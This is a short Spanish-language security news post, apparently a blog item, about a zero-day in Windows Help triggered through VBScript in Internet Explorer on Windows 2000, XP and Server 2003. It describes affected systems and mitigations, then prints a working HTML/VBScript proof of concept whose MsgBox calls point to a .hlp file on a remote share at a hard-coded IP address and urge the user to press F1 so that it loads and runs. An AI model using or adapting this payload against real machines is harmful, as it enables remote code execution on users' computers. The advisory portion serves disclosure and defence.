Ojo con pulsar F1 en XP (0day)

La vulnerabilidad existente interactúa con los archivos VBScript de Ayuda de Windows utilizando Internet Explorer. Por lo que si un sitio web malintencionado muestra un cuadro de diálogo especialmente diseñado para que pulsemos la tecla F1, un código arbitrario creado por el ciberdelincuente podría ser ejecutado dentro de nuestro ordenador. El investigador polaco llamó a este error un error lógico donde los asaltantes podrían disfrazar su código como un archivo de ayuda de Windows.

Los sistemas operativos Windows que están afectados por este fallo son los siguientes: Windows 2000, Windows Xp y Windows Server 2003 y cualquiera de las versiones de Internet Explorer que estén utilizando en sus equipos, incluyendo el desaparecido Internet Explorer 6. Por el momento la única manera de protegerse es NO pulsando F1 cuando un sitio web nos incita a realizarlo. Pero si esto no te convence y quieres estar más seguro aún siempre puedes desactivar la Ayuda de Windows y de esta forma bloquearlo a todos los efectos.

Exploit:

<html>
<script type="text/vbscript">
ruta= "\\184.73.14.110\PUBLIC\test.hlp"

MsgBox "Presiona F1 si quieres salvar el mundo", ,"Salva el mundo",ruta, 1
MsgBox "Preciona F1 para cerrar el popup", ,"", ruta, 1
MsgBox "Presiona F1 para cerrar el popup", ,"", ruta, 1
</script>
</html>

Los clientes que estén usando Windows Vista, Windows 7, Windows Server 2008 o Windows Server 2008 R2 están protegidos de dichos ataques.